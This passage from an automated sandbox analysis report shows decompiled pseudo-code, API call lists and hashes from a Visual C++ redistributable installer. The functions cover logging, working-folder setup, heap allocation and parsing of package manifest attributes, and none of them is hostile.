                                                                          					E00011174(_t42,  &_v44, 9);
                                                                          				} else {
                                                                          					E000111FB();
                                                                          				}
                                                                          				_t33 = E0001508D(_t42, _t45, _t52, _t41, _t49, _t46, _a16,  &_v52); // executed
                                                                          				_t47 = _t33;
                                                                          				if(_t49 != 0xffffffff) {
                                                                          					FindCloseChangeNotification(_t49); // executed
                                                                          				}
                                                                          				if(_v48 != 0) {
                                                                          					E000554EF(_v48);
                                                                          				}
                                                                          				_t35 =  <  ? _t47 : _v52;
                                                                          				return E0003DE36(_t41, _v8 ^ _t50, _t45, _t47, _t49);
                                                                          			}

































                                                                          APIs
                                                                            • Part of subcall function 000133D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000110DD,?,00000000), ref: 000133F8
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 000110F6
                                                                            • Part of subcall function 00011174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011185
                                                                            • Part of subcall function 00011174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011190
                                                                            • Part of subcall function 00011174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0001119E
                                                                            • Part of subcall function 00011174: GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111B9
                                                                            • Part of subcall function 00011174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000111C1
                                                                            • Part of subcall function 00011174: GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111D6
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,0005B4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 00011131
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFileLastModuleProc$ChangeCloseCreateFindHandleHeapInformationNameNotification
                                                                          • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                          • API String ID: 2670336470-3151496603
                                                                          • Opcode ID: cb18841df104a759d3fdfea2bb6331445b67461286eb6e559c795be7ef172b8d
                                                                          • Instruction ID: fada86546bff0d9930af5ce0fec7ddae8380244117806ade44afe8ea1ea0130a
                                                                          • Opcode Fuzzy Hash: cb18841df104a759d3fdfea2bb6331445b67461286eb6e559c795be7ef172b8d
                                                                          • Instruction Fuzzy Hash: 67214171900218ABDB209FA5DC45BEFBBB8FF49715F504119FA20B7292D774A948CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E0004FDC2(void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				struct _SYSTEMTIME _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				long _v36;
                                                                          				long _v40;
                                                                          				void* __ebx;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t34;
                                                                          				void* _t39;
                                                                          				intOrPtr* _t42;
                                                                          				void* _t43;
                                                                          				signed int _t48;
                                                                          				signed int _t49;
                                                                          				intOrPtr _t50;
                                                                          				intOrPtr _t51;
                                                                          				intOrPtr _t58;
                                                                          				void* _t60;
                                                                          				intOrPtr _t61;
                                                                          				void* _t68;
                                                                          				signed int _t73;
                                                                          				char* _t75;
                                                                          				signed int _t76;
                                                                          				void* _t79;
                                                                          
                                                                          				_t70 = __edi;
                                                                          				_t34 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t34 ^ _t76;
                                                                          				_t61 = _a12;
                                                                          				_t74 = 0;
                                                                          				_v28 = _v28 & 0;
                                                                          				_v32 = _v32 & 0;
                                                                          				_t79 =  *0x7b634 - _t74; // 0x0
                                                                          				if(_t79 != 0) {
                                                                          					L19:
                                                                          					return E0003DE36(_t61, _v8 ^ _t76, _t68, _t70, _t74);
                                                                          				}
                                                                          				EnterCriticalSection(0x7b60c);
                                                                          				if(_a16 == 0) {
                                                                          					L10:
                                                                          					_t39 = E00012436(_t68,  &_v32, _t61, 0, 0xfde9);
                                                                          					_t74 = _t39;
                                                                          					if(_t39 >= 0) {
                                                                          						_t42 =  *0x7b63c; // 0x0
                                                                          						if(_t42 == 0) {
                                                                          							_t43 = E00050658(_t62, _t68, _v32); // executed
                                                                          						} else {
                                                                          							_t43 =  *_t42(_v32,  *0x7b640);
                                                                          						}
                                                                          						_t74 = _t43;
                                                                          					}
                                                                          					L15:
                                                                          					LeaveCriticalSection(0x7b60c);
                                                                          					if(_v28 != 0) {
                                                                          						E000554EF(_v28);
                                                                          					}
                                                                          					if(_v32 != 0) {
                                                                          						E000554EF(_v32);
                                                                          					}
                                                                          					goto L19;
                                                                          				}
                                                                          				_push(__edi);
                                                                          				_v40 = GetCurrentProcessId();
                                                                          				_v36 = GetCurrentThreadId();
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				GetLocalTime( &_v24);
                                                                          				_t48 = _a8;
                                                                          				_t49 = _t48 & 0xf0000000;
                                                                          				_t73 = _t48 & 0x0fffffff;
                                                                          				if(_t49 == 0xe0000000 || _a4 == 5) {
                                                                          					_t75 = "e";
                                                                          				} else {
                                                                          					if(_t49 == 0xa0000000 || _a4 == 1) {
                                                                          						_t75 = "w";
                                                                          					} else {
                                                                          						_t75 = "i";
                                                                          					}
                                                                          				}
                                                                          				_t50 =  *0x7b628; // 0x0
                                                                          				_t66 =  !=  ? _t50 : L"\r\n";
                                                                          				_t51 =  *0x7b62c; // 0x0
                                                                          				_push( !=  ? _t50 : L"\r\n");
                                                                          				_push(_t61);
                                                                          				_t62 =  !=  ? _t51 : 0x5b524;
                                                                          				_push( !=  ? _t51 : 0x5b524);
                                                                          				_push(_t73);
                                                                          				_push(_t75);
                                                                          				_push(_v24.wSecond & 0x0000ffff);
                                                                          				_push(_v24.wMinute & 0x0000ffff);
                                                                          				_push(_v24.wHour & 0x0000ffff);
                                                                          				_push(_v24.wDay & 0x0000ffff);
                                                                          				_push(_v24.wMonth & 0x0000ffff);
                                                                          				_push(_v24.wYear & 0x0000ffff);
                                                                          				_push(_v36);
                                                                          				_t58 =  *0x7b624; // 0x0
                                                                          				_push(_v40);
                                                                          				_t68 =  !=  ? _t58 : 0x5b524;
                                                                          				_t60 = E00011F20( &_v28, L"%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls", 0x5b524);
                                                                          				_t74 = _t60;
                                                                          				_pop(_t70);
                                                                          				if(_t60 < 0) {
                                                                          					goto L15;
                                                                          				}
                                                                          				goto L10;
                                                                          			}





























                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0007B60C,00000000,?,?,?,?,00031014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0004FDF0
                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,00031014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0004FE00
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0004FE09
                                                                          • GetLocalTime.KERNEL32(8007139F,?,00031014,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0004FE1F
                                                                          • LeaveCriticalSection.KERNEL32(0007B60C,?,00000000,00000000,0000FDE9), ref: 0004FF12
                                                                          Strings
                                                                          • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0004FEB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                          • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                          • API String ID: 296830338-59366893
                                                                          • Opcode ID: fdf6f99fc77ae7557ba34f27e20801d3985a40af3c35cb129b5ec57401dc5c23
                                                                          • Instruction ID: 7f4094ca192bf512d26d7a2cf6a39fbf7cb51859ce97e8d1465576b6757a5dc8
                                                                          • Opcode Fuzzy Hash: fdf6f99fc77ae7557ba34f27e20801d3985a40af3c35cb129b5ec57401dc5c23
                                                                          • Instruction Fuzzy Hash: 8A417F72D00619AFEB609BA5CC45AFFB7F8AB08712F404035FA05E6151D73C9D84CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 21%
                                                                          			E00029EB7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                          				void* _v8;
                                                                          				void* _t12;
                                                                          				void* _t13;
                                                                          				void* _t27;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_t12 = E000280AE(__edx, _a4,  &_v8); // executed
                                                                          				if(_t12 >= 0) {
                                                                          					_t13 = E00014013(_v8, 0); // executed
                                                                          					_t27 = _t13;
                                                                          					if(_t27 >= 0) {
                                                                          						__imp__DecryptFileW(_v8, 0); // executed
                                                                          						if(_a8 != 0) {
                                                                          							_t27 = E000121A5(_a8, _v8, 0);
                                                                          							if(_t27 < 0) {
                                                                          								_push("Failed to copy working folder.");
                                                                          								goto L7;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed create working folder.");
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to calculate working folder to ensure it exists.");
                                                                          					L7:
                                                                          					_push(_t27);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t27;
                                                                          			}








                                                                          Strings
                                                                          • Failed to copy working folder., xrefs: 00029F12
                                                                          • Failed to calculate working folder to ensure it exists., xrefs: 00029ED4
                                                                          • Failed create working folder., xrefs: 00029EEA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                          • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                          • API String ID: 3841436932-2072961686
                                                                          • Opcode ID: dd5a7f22c0d767e12d422a5a49c346ab5660d7c681b1dba16661cabcd5ab289a
                                                                          • Instruction ID: 2804721c9d023a6dc0c6c593df701dc7e4402769a08f1dedafc56d3e58e64d8b
                                                                          • Opcode Fuzzy Hash: dd5a7f22c0d767e12d422a5a49c346ab5660d7c681b1dba16661cabcd5ab289a
                                                                          • Instruction Fuzzy Hash: E9018831D05638F78FA29B55ED06CEFBA79DF81721F114165F904AA112DB328E50A6D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00044812(int _a4) {
                                                                          				void* _t14;
                                                                          				void* _t15;
                                                                          				void* _t17;
                                                                          				void* _t18;
                                                                          				void* _t19;
                                                                          
                                                                          				if(E00048A73(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                          					TerminateProcess(GetCurrentProcess(), _a4);
                                                                          				}
                                                                          				E00044897(_t15, _a4);
                                                                          				ExitProcess(_a4);
                                                                          			}









                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002,00000000), ref: 00044833
                                                                          • TerminateProcess.KERNEL32(00000000,?,000447E8,00000000,00077CF8,0000000C,0004493F,00000000,00000002,00000000), ref: 0004483A
                                                                          • ExitProcess.KERNEL32 ref: 0004484C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 0777cf9eab177cc66dd2c241465f13cdbdffc3d6a8d58e02bd5be7409c362750
                                                                          • Instruction ID: a98a540d67536a2af6ed9e51d2035a4e863699b6def9bbdf4b70ee04056a6624
                                                                          • Opcode Fuzzy Hash: 0777cf9eab177cc66dd2c241465f13cdbdffc3d6a8d58e02bd5be7409c362750
                                                                          • Instruction Fuzzy Hash: 5CE09271400688ABDF516F65D909AAE3B69AB41342F454428F8058B122DB39E952DA98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E000138D4(long _a4, signed int _a8) {
                                                                          				void* _t7;
                                                                          
                                                                          				asm("sbb eax, eax");
                                                                          				_t7 = RtlAllocateHeap(GetProcessHeap(),  ~_a8 & 0x00000008, _a4); // executed
                                                                          				return _t7;
                                                                          			}





                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID:
                                                                          • API String ID: 1357844191-0
                                                                          • Opcode ID: 4524fdd042af25fa3db74e7f15361a92f4056be3f073b11ef104cac9a8e41eb4
                                                                          • Instruction ID: 359f2145ed62f0275cfc94a90f38cb166addf9a7b7b5c4fcbd8380e491ed5061
                                                                          • Opcode Fuzzy Hash: 4524fdd042af25fa3db74e7f15361a92f4056be3f073b11ef104cac9a8e41eb4
                                                                          • Instruction Fuzzy Hash: 90C012321A0708AB8F406FF8EC0EC9A3BACAB686037408400B905C2150DB3CF0148B64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0003E773() {
                                                                          				_Unknown_base(*)()* _t1;
                                                                          
                                                                          				_t1 = SetUnhandledExceptionFilter(E0003E77F); // executed
                                                                          				return _t1;
                                                                          			}





                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0002E77F,0003DEF8), ref: 0003E778
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 57cc036a6b5489b41a45003a776e1cba86e643729b513cb4d0b813873e00abaa
                                                                          • Instruction ID: c931b54d8f799867eff4f5b71183e017cc8a3d4f971b9b3705d861aa5d0b7290
                                                                          • Opcode Fuzzy Hash: 57cc036a6b5489b41a45003a776e1cba86e643729b513cb4d0b813873e00abaa
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 71%
                                                                          			E0001DE25(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				signed int _v32;
                                                                          				signed int _v36;
                                                                          				short** _v40;
                                                                          				intOrPtr* _t208;
                                                                          				intOrPtr* _t213;
                                                                          				intOrPtr _t223;
                                                                          				signed int _t224;
                                                                          				int _t235;
                                                                          				signed int _t256;
                                                                          				int _t262;
                                                                          				signed int _t268;
                                                                          				intOrPtr _t271;
                                                                          				intOrPtr _t275;
                                                                          				signed int _t279;
                                                                          				intOrPtr _t280;
                                                                          				signed int _t292;
                                                                          				intOrPtr _t302;
                                                                          				signed int _t303;
                                                                          				intOrPtr* _t318;
                                                                          				short** _t320;
                                                                          				intOrPtr* _t322;
                                                                          				intOrPtr* _t324;
                                                                          				intOrPtr* _t325;
                                                                          				signed int _t328;
                                                                          				signed int _t329;
                                                                          				intOrPtr* _t330;
                                                                          				signed int _t336;
                                                                          				void* _t346;
                                                                          				signed int _t347;
                                                                          				signed int _t348;
                                                                          				signed int _t349;
                                                                          				signed int _t350;
                                                                          				signed int _t351;
                                                                          				short** _t358;
                                                                          				void* _t360;
                                                                          
                                                                          				_v20 = _v20 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v24 = _v24 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v28 = _v28 & 0x00000000;
                                                                          				_v16 = _v16 & 0x00000000;
                                                                          				_t351 = E00053803(_a12, L"RollbackBoundary",  &_v20);
                                                                          				if(_t351 >= 0) {
                                                                          					_t208 = _v20;
                                                                          					_t321 =  *_t208;
                                                                          					_t351 =  *((intOrPtr*)( *_t208 + 0x20))(_t208,  &_v24);
                                                                          					if(_t351 >= 0) {
                                                                          						_t210 = _v24;
                                                                          						_push(__ebx);
                                                                          						_t318 = _a4;
                                                                          						if(_v24 == 0) {
                                                                          							L17:
                                                                          							_t322 = _v20;
                                                                          							if(_t322 != 0) {
                                                                          								 *((intOrPtr*)( *_t322 + 8))(_t322);
                                                                          								_v20 = _v20 & 0x00000000;
                                                                          							}
                                                                          							if(E00053803(_a12, L"Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage",  &_v20) >= 0) {
                                                                          								_t213 = _v20;
                                                                          								_t340 =  &_v24;
                                                                          								_push( &_v24);
                                                                          								_push(_t213);
                                                                          								if( *((intOrPtr*)( *_t213 + 0x20))() >= 0) {
                                                                          									_t215 = _v24;
                                                                          									if(_v24 == 0) {
                                                                          										L123:
                                                                          										_t351 = 0;
                                                                          										goto L124;
                                                                          									}
                                                                          									_t223 = E000138D4(_t215 * 0xe0, 1); // executed
                                                                          									 *((intOrPtr*)(_t318 + 8)) = _t223;
                                                                          									if(_t223 != 0) {
                                                                          										_t224 = _v24;
                                                                          										_v32 = _v32 & 0x00000000;
                                                                          										 *((intOrPtr*)(_t318 + 0xc)) = _t224;
                                                                          										if(_t224 == 0) {
                                                                          											L106:
                                                                          											_t351 = E0001D87E(_t318, _a12);
                                                                          											if(_t351 >= 0) {
                                                                          												goto L123;
                                                                          											}
                                                                          											_push("Failed to parse target product codes.");
                                                                          											goto L108;
                                                                          										}
                                                                          										_t328 = 0;
                                                                          										_v36 = 0;
                                                                          										while(1) {
                                                                          											_t346 =  *((intOrPtr*)(_t318 + 8)) + _t328;
                                                                          											_t351 = E00053760(_t328, _v20,  &_v8,  &_v12);
                                                                          											if(_t351 < 0) {
                                                                          												break;
                                                                          											}
                                                                          											_t351 = E000531C7(_v8, L"Id", _t346);
                                                                          											if(_t351 < 0) {
                                                                          												L121:
                                                                          												_push("Failed to get @Id.");
                                                                          												goto L108;
                                                                          											}
                                                                          											_t351 = E000531C7(_v8, L"Cache",  &_v16);
                                                                          											if(_t351 < 0) {
                                                                          												_push("Failed to get @Cache.");
                                                                          												goto L108;
                                                                          											}
                                                                          											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
                                                                          												if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
                                                                          													_t235 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"always", 0xffffffff);
                                                                          													_t328 = 2;
                                                                          													if(_t235 != _t328) {
                                                                          														_push(_v16);
                                                                          														_t351 = 0x8000ffff;
                                                                          														_push("Invalid cache type: %ls");
                                                                          														L119:
                                                                          														_push(_t351);
                                                                          														E0005012F();
                                                                          														goto L124;
                                                                          													}
                                                                          													 *(_t346 + 0x20) = _t328;
                                                                          													L37:
                                                                          													_t351 = E000531C7(_v8, L"CacheId", _t346 + 0x24);
                                                                          													if(_t351 < 0) {
                                                                          														_push("Failed to get @CacheId.");
                                                                          														goto L108;
                                                                          													}
                                                                          													_t351 = E0005329B(_v8, L"Size", _t346 + 0x30);
                                                                          													if(_t351 < 0) {
                                                                          														_push("Failed to get @Size.");
                                                                          														goto L108;
                                                                          													}
                                                                          													_t351 = E0005329B(_v8, L"InstallSize", _t346 + 0x28);
                                                                          													if(_t351 < 0) {
                                                                          														_push("Failed to get @InstallSize.");
                                                                          														goto L108;
                                                                          													}
                                                                          													_t351 = E000533DB(_t328, _v8, L"PerMachine", _t346 + 0x14);
                                                                          													if(_t351 < 0) {
                                                                          														_push("Failed to get @PerMachine.");
                                                                          														goto L108;
                                                                          													}
                                                                          													_t351 = E000533DB(_t328, _v8, L"Permanent", _t346 + 0x18);
                                                                          													if(_t351 < 0) {
                                                                          														_push("Failed to get @Permanent.");
                                                                          														goto L108;
                                                                          													}
                                                                          													 *(_t346 + 0x18) = 0 |  *(_t346 + 0x18) == 0x00000000;
                                                                          													_t351 = E000533DB(_t328, _v8, L"Vital", _t346 + 0x1c);
                                                                          													if(_t351 < 0) {
                                                                          														L112:
                                                                          														_push("Failed to get @Vital.");
                                                                          														goto L108;
                                                                          													}
                                                                          													_t351 = E000531C7(_v8, L"LogPathVariable", _t346 + 4);
                                                                          													if(_t351 == 0x80070490 || _t351 >= 0) {
                                                                          														_t351 = E000531C7(_v8, L"RollbackLogPathVariable", _t346 + 8);
                                                                          														if(_t351 == 0x80070490 || _t351 >= 0) {
                                                                          															_t256 = E000531C7(_v8, L"InstallCondition", _t346 + 0xc); // executed
                                                                          															_t351 = _t256;
                                                                          															if(_t351 == 0x80070490 || _t351 >= 0) {
                                                                          																_t351 = E000531C7(_v8, L"RollbackBoundaryForward",  &_v16);
                                                                          																if(_t351 == 0x80070490) {
                                                                          																	L52:
                                                                          																	_t351 = E000531C7(_v8, L"RollbackBoundaryBackward",  &_v16);
                                                                          																	if(_t351 == 0x80070490) {
                                                                          																		L55:
                                                                          																		if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"ExePackage", 0xffffffff) != 2) {
                                                                          																			_t262 = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MsiPackage", 0xffffffff);
                                                                          																			_t329 = 2;
                                                                          																			if(_t262 != _t329) {
                                                                          																				if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MspPackage", 0xffffffff) != 2) {
                                                                          																					if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MsuPackage", 0xffffffff) != 2) {
                                                                          																						L66:
                                                                          																						_t351 = E0001D9EE(_t318, _t346, _a8, _v8);
                                                                          																						if(_t351 < 0) {
                                                                          																							_push("Failed to parse payload references.");
                                                                          																							goto L108;
                                                                          																						}
                                                                          																						_t351 = E00037CD9(_t346, _v8);
                                                                          																						if(_t351 < 0) {
                                                                          																							_push("Failed to parse dependency providers.");
                                                                          																							goto L108;
                                                                          																						}
                                                                          																						_t330 = _v8;
                                                                          																						if(_t330 != 0) {
                                                                          																							 *((intOrPtr*)( *_t330 + 8))(_t330);
                                                                          																							_v8 = _v8 & 0x00000000;
                                                                          																						}
                                                                          																						if(_v12 != 0) {
                                                                          																							__imp__#6(_v12);
                                                                          																							_v12 = _v12 & 0x00000000;
                                                                          																						}
                                                                          																						_t268 = _v32 + 1;
                                                                          																						_t328 = _v36 + 0xe0;
                                                                          																						_v32 = _t268;
                                                                          																						_v36 = _t328;
                                                                          																						if(_t268 < _v24) {
                                                                          																							continue;
                                                                          																						} else {
                                                                          																							_t356 = _v28;
                                                                          																							if(_v28 == 0) {
                                                                          																								goto L106;
                                                                          																							}
                                                                          																							_t271 = E000138D4(_t356 << 4, 1);
                                                                          																							 *((intOrPtr*)(_t318 + 0x20)) = _t271;
                                                                          																							if(_t271 != 0) {
                                                                          																								 *((intOrPtr*)(_t318 + 0x24)) = E000138D4(_t356 << 2, 1);
                                                                          																								if( *((intOrPtr*)(_t318 + 0x20)) != 0) {
                                                                          																									_t275 = 0;
                                                                          																									_a8 = 0;
                                                                          																									if( *((intOrPtr*)(_t318 + 0xc)) <= 0) {
                                                                          																										goto L106;
                                                                          																									}
                                                                          																									_t347 = 0;
                                                                          																									_v28 = 0;
                                                                          																									do {
                                                                          																										_t358 =  *((intOrPtr*)(_t318 + 8)) + _t347;
                                                                          																										_v40 = _t358;
                                                                          																										if( *((intOrPtr*)(_t358 + 0x8c)) != 3) {
                                                                          																											goto L105;
                                                                          																										}
                                                                          																										 *((intOrPtr*)( *((intOrPtr*)(_t318 + 0x20)) + ( *(_t318 + 0x28) +  *(_t318 + 0x28)) * 8)) =  *((intOrPtr*)(_t358 + 0x94));
                                                                          																										 *((intOrPtr*)( *((intOrPtr*)(_t318 + 0x20)) + 4 + ( *(_t318 + 0x28) +  *(_t318 + 0x28)) * 8)) = 2;
                                                                          																										 *((intOrPtr*)( *((intOrPtr*)(_t318 + 0x24)) +  *(_t318 + 0x28) * 4)) = _t358;
                                                                          																										_t336 = 0;
                                                                          																										 *(_t318 + 0x28) =  *(_t318 + 0x28) + 1;
                                                                          																										_v36 = 0;
                                                                          																										if( *((intOrPtr*)(_t318 + 0xc)) <= 0) {
                                                                          																											L104:
                                                                          																											_t275 = _a8;
                                                                          																											goto L105;
                                                                          																										}
                                                                          																										_t279 = 0;
                                                                          																										_v32 = 0;
                                                                          																										do {
                                                                          																											_t360 =  *((intOrPtr*)(_t318 + 8)) + _t279;
                                                                          																											if( *((intOrPtr*)(_t360 + 0x8c)) != 2) {
                                                                          																												goto L102;
                                                                          																											}
                                                                          																											_t348 = 0;
                                                                          																											if( *((intOrPtr*)(_t360 + 0xd4)) <= 0) {
                                                                          																												goto L102;
                                                                          																											}
                                                                          																											_t320 = _v40;
                                                                          																											do {
                                                                          																												_t280 =  *((intOrPtr*)(_t360 + 0xd0));
                                                                          																												if( *(_t280 + _t348 * 4) != 0 && CompareStringW(0x7f, 0,  *_t320, 0xffffffff,  *(_t280 + _t348 * 4), 0xffffffff) == 2) {
                                                                          																													 *( *((intOrPtr*)(_t360 + 0xcc)) + _t348 * 4) = _t320;
